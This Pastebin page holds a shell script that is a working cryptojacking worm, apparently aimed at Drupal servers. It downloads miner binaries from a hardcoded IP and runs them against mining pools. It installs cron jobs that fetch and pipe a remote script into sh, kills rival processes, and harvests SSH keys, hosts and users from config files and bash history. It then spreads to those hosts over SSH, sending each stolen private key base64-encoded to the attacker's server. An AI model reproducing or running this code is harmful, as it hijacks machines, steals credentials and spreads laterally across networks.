daily pastebin goal
93%
SHARE
TWEET

something.sh

a guest May 9th, 2018 119 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/sh
  2. #POOL=188.166.148.89:53:443
  3. POOL=188.166.148.89:444
  4. POOL=217.182.231.56:443
  5. basepath=$(cd `dirname $0`; pwd)
  6. XMHTTP="http://188.166.148.89:53"
  7. USERID=$1
  8. if [ -s /usr/share/man/11.gz ]; then exit; fi;
  9.  
  10. killme() {
  11.   killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|wget|curl|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &
  12. }
  13. if [ $# -eq 0 ]; then USERID=$(hostname); fi
  14. if [ $# -eq 2 ]; then killme; fi
  15. echo $USERID;
  16. USERID="DRUPAL"
  17.  
  18. BIN1="xm64"
  19. BIN2="xm64s"
  20. BIN3="xm32s"
  21. #BIN4="xm32"
  22. WGET="wget"
  23. if [ -s /usr/bin/curl ]; then WGET="curl -o"; fi;if [ -s /usr/bin/wget ]; then WGET="wget -O"; fi;if [ $(uname -a | grep sparc |wc -l) -eq 1 ]; then echo sparc; exit; fi;if [ $(uname -a | grep AIX |wc -l) -eq 1 ]; then echo AIX; exit; fi;
  24.  
  25. #ps auxw|sort -rn -k3|head -1|awk '{if($3>60.0) print "kill -9 " $2}'|sh
  26. killa() {
  27. what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&
  28. }
  29. killa v3
  30. #killa 34e2fg
  31. killall -9 curl;killall -9 wget;killa wget;killa curl
  32. ps auxw|grep jnkcfg|awk '{print $2}'|xargs kill -9
  33. crontab -r;echo "*/30 * * * * $WGET /tmp/.XO-lock $XMHTTP/a.sh; sh /tmp/.XO-lock;rm /tmp/.XO-lock" > /tmp/cron;crontab /tmp/cron ;rm -rf /tmp/cron
  34. cat /etc/crontab |awk '!/wget/' |awk '!/curl/' > /tmp/v
  35. mv -f /tmp/v /etc/crontab
  36. rm /tmp/v
  37. echo "*/30 * * * * root  $WGET /tmp/.XO-lock $XMHTTP/a.sh;sh /tmp/.XO-lock;rm /tmp/.XO-lock" >> /etc/crontab
  38. echo "Killing big CPU"
  39. VAR=$(ps uwx|awk '{print $2":"$3}'| grep -v CPU)
  40. for word in $VAR
  41. do
  42.   CPUUSAGE=$(echo $word|awk -F":" '{print $2}'|awk -F"." '{ print $1}')
  43.   if [ $CPUUSAGE -gt 60 ]; then    echo BIG $word;    PID=$(echo $word | awk -F":" '{print $1'});LINE=$(ps uwx | grep $PID);COUNT=$(echo $LINE| grep -P "er/v5|34e2|Xtmp|wf32N4|moy5Me|ssh"|wc -l);if [ $COUNT -eq 0 ]; then echo KILLING $line; fi;kill $PID;fi;
  44. done
  45. echo DONE
  46. proc=`grep -c ^processor /proc/cpuinfo`
  47. cores=$((($proc+1)/2)); if [ ! $core ]; then cores=2;fi
  48. num=$(($cores*3));/sbin/sysctl -w vm.nr_hugepages=`echo $num`
  49.  
  50. alr() {
  51.     already=$(ps aux|grep -E  "(ker/v5|moy5|34e2)" | grep -v grep | wc -l);already2=$(ps aux|awk  "/ker\/v5|moy5|34e2/" | awk '!/awk/'| wc -l)
  52. }
  53. dl_and_exec()
  54. {
  55.   REP=$1
  56. alr
  57. if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  58.     echo "Not running"
  59.     mkdir $REP/.jnks
  60.     echo /usr/bin/$WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN1
  61.     $WGET $REP/.jnks/chron-34e2fg http://188.166.148.89:53/$BIN1
  62.     chmod 707 $REP/.jnks/chron-34e2fg
  63.     $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN1  -k --donate-level 1 --cpu-priority 4 -B
  64.     alr
  65.  
  66.     if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  67.  
  68.       echo "First chron-34e2fg doesnt work"
  69.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN2
  70.       chmod 707 $REP/.jnks/chron-34e2fg
  71.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN2 -k --donate-level 1 --cpu-priority 4 -B
  72.  
  73. alr
  74.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  75.       echo "First  doesnt work"
  76.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN3
  77.       chmod 707 $REP/.jnks/chron-34e2fg
  78.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN3  -k --donate-level 1 --cpu-priority 4 -B
  79.      alr
  80.  return
  81.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  82.       echo "First  doesnt work"
  83.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN4
  84.       chmod 707 $REP/.jnks/chron-34e2fg
  85.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN4  -k --donate-level 1  -B
  86.      alr
  87.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  88.       echo "First  doesnt work"
  89.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN4
  90.       chmod 707 $REP/.jnks/chron-34e2fg
  91.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN4  -k --donate-level 1 --cpu-priority 4 -B
  92.  
  93.      alr
  94.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  95.       echo "First  doesnt work"
  96.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN5
  97.       chmod 707 $REP/.jnks/chron-34e2fg
  98.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN5  -k --donate-level 1 --cpu-priority 4 -B
  99.      alr
  100.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  101.       echo "First  doesnt work"
  102.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN6
  103.       chmod 707 $REP/.jnks/chron-34e2fg
  104.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN6  -k --donate-level 1 --cpu-priority 4 -B
  105.  
  106.  
  107.  
  108.  
  109.  
  110.      alr
  111.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  112.        $WGET $XMHTTP/NOWORK
  113.      fi;fi;fi;fi;fi;fi;fi;fi;
  114. }
  115.  
  116. if ( command -v ps > /dev/null && ( command -v grep > /dev/null || command -v awk > /dev/null ) )  # do this if ps exists and grep or awk exists
  117. then
  118.   echo "OK ps and grep or awk"
  119. #  dl_and_exec "/var/tmp"
  120.   dl_and_exec "/tmp"
  121. #  dl_and_exec "/dev/shm"
  122. #  dl_and_exec "."
  123. else
  124.    echo "Not ok" # do without grep possibility
  125.    killme
  126.    dl_and_exec "/tmp"
  127. fi;
  128.  
  129. cd /home
  130. already=$(ps aux|grep "yes yes" | grep -v grep | wc -l)
  131.  
  132. if  [ ${already} -ne 0 ] ; then
  133.   echo "killing yes and ssh"
  134.   killall yes
  135.   killall ssh
  136.   exit
  137. fi
  138.  
  139.  
  140.  
  141. KEYS=$(find ~/ /root /home -maxdepth 2 -name '\.ssh'|xargs find|awk '/pub|pem/')
  142. KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config|grep IdentityFile|awk -F "IdentityFile" '{print $2 }')
  143. KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)"|awk -F ' -i ' '{print $2}'|awk '{print $1'})
  144. cd ~
  145. HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config|grep HostName|awk -F "HostName" '{print $2}')
  146. HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)"| grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  147. HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)"|tr ':' ' '|awk -F '@' '{print $2}'|awk -F '{print $1}')
  148. HOSTS4=$(cat /etc/hosts|awk '{print $1}')
  149. HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts| grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  150. HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  151. HOSTS="$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6"
  152. USERS=$(ls /home)
  153. USERS="$USERS root"
  154. USERS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)"|awk -F '@' '{print $1}'|awk '{print $NF'})
  155. USERS="$USERS $USERS2 $(whoami)"
  156. KEYS="$KEYS3 $KEYS2 $KEYS"
  157. HOSTS=$(echo $HOSTS|tr ' ' '\n'|sort|uniq|grep -v 127.0.0.1|grep -v localhost|grep -v 127.0.1.1|grep -v ff02|grep -v '\#'|grep -v '::1'|grep -v '00::0' |grep -v 188.166.148.89)
  158. USERS=$(echo $USERS|tr ' ' '\n'|sort|uniq|grep -v "/bin/bash"|grep -v "~"|grep -v "/"|grep -v keygen|grep -v "\-\-help"|grep -v ".ssh"|grep -v "ssh-agent"|grep -v sshpass|grep -v "\-l"|grep -v "\&")
  159. KEYS=$(echo $KEYS|tr ' ' '\n'|awk -F '\.pub' '{print $1}'|sort|uniq)
  160. KEYS2=""
  161. for key in $KEYS;
  162. do
  163.   echo $key;
  164.   if [ -f $key ];then
  165.     KEYS2="$KEYS2 $key"
  166.   fi;
  167. done;
  168. KEYS=$KEYS2
  169. echo "HOSTS $HOSTS"
  170. echo "USERS $USERS"
  171. echo "KEYS $KEYS"
  172. i=0
  173. for user in $USERS
  174. do
  175.   for host in $HOSTS
  176.   do
  177.     for key in $KEYS
  178.     do
  179.     ((i++))
  180.     if [ "${i}" -eq "10" ]; then sleep 5;
  181.       ps wx|grep "yes"|awk '{print $1}' | xargs kill -9&>/dev/null&
  182.       ps wx|grep "ssh -o"|awk '{print $1}' | xargs kill -9&>/dev/null&
  183.       ps wx|grep "$WGET"|awk '{print $1}' | xargs kill -9&>/dev/null&
  184.       i=0
  185.     fi;
  186.     chmod +r $key
  187.     mykey=$(cat $key|base64 -w0)
  188.     chmod 400 $key
  189.     me=$(hostname)
  190.       payload=$(echo ".$me.$mykey.$key.$user@$host") #|base64 -w0)
  191.       echo "ssh -oStrictHostKeyChecking=no -i $key $user@$host"
  192.       yes yes| ssh -oStrictHostKeyChecking=no -i $key $user@$host  "$WGET /dev/null $XMHTTP/YEY__$payload;$WGET - -q $XMHTTP/a.sh|bash;curl -o /dev/null $XMHTTP/CYEY__$payload;curl -o - $XMHTTP/a.sh| bash"&
  193.  
  194.     done
  195.   done
  196. done
  197.  
  198. echo "Ending"
  199. ps wx|grep "yes"|awk '{print $1}' | xargs kill -9&>/dev/null&
  200. ps wx|grep "ssh -o"|awk '{print $1}' | xargs kill -9&>/dev/null&
  201. ps wx|grep "$WGET"|awk '{print $1}' | xargs kill -9&>/dev/null&
  202.  
  203. echo RMing
  204. rm /dev/shm/.*
  205. rm /dev/shm/Xtmp
  206. rm -rf $basepath/.abc2 $basepath/.X11session3 $basepath/xmrig* $basepath/apache.sh
  207. rm $basepath/apache.sh
  208. rm -rf ./atd
  209. rm -rf /var/tmp/vmstat
  210. rm -rf /var/tmp/adcixstgtf.cf
  211. rm /var/tmp/wa
  212. killa vmstat
  213. echo Killing
  214. killall -9 initsyslog
  215. PID=$(ps auxw|grep -oP "\b[0-9a-f]{32}")
  216. PI1=$(echo $PID|awk '{print $1}')
  217. PI2=$(echo $PID|awk '{print $2}')
  218. PI3=$(echo $PID|awk '{print $3}')
  219. PI4=$(echo $PID|awk '{print $4}')
  220. PI5=$(echo $PID|awk '{print $5}')
  221. PI6=$(echo $PID|awk '{print $6}')
  222. PI7=$(echo $PID|awk '{print $7}')
  223. PI8=$(echo $PID|awk '{print $8}')
  224. PI9=$(echo $PID|awk '{print $9}')
  225. PI10=$(echo $PID|awk '{print $10}')
  226.  
  227. ps wx|grep $PI1 |awk '{print $1}' | xargs kill -9&>/dev/null&
  228. ps wx|grep $PI2 |awk '{print $1}' | xargs kill -9&>/dev/null&
  229. ps wx|grep $PI3|awk '{print $1}' | xargs kill -9&>/dev/null&
  230. ps wx|grep $PI4 |awk '{print $1}' | xargs kill -9&>/dev/null&
  231. ps wx|grep $PI5 |awk '{print $1}' | xargs kill -9&>/dev/null&
  232. ps wx|grep $PI6 |awk '{print $1}' | xargs kill -9&>/dev/null&
  233. ps wx|grep $PI7 |awk '{print $1}' | xargs kill -9&>/dev/null&
  234. ps wx|grep $PI8 |awk '{print $1}' | xargs kill -9&>/dev/null&
  235. ps wx|grep $PI9 |awk '{print $1}' | xargs kill -9&>/dev/null&
  236. ps wx|grep $PI10 |awk '{print $1}' | xargs kill -9&>/dev/null&
  237. ps wx|grep "/tmp/"|grep jenk | awk '{print $1}' | xargs kill -9&>/dev/null&
  238. ps wx|grep "/tmp/"|grep tomcat | awk '{print $1}' | xargs kill -9&>/dev/null&
  239. killa suppoie
  240. killa irq
  241. killa xmr
  242. killa mine
  243. killa config.json
  244. killa supsplk
  245. killa javajar
  246. killa javass
  247. pkill -f idceo
  248. ps auxw|grep 34e
  249. ps auxw|grep v5
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top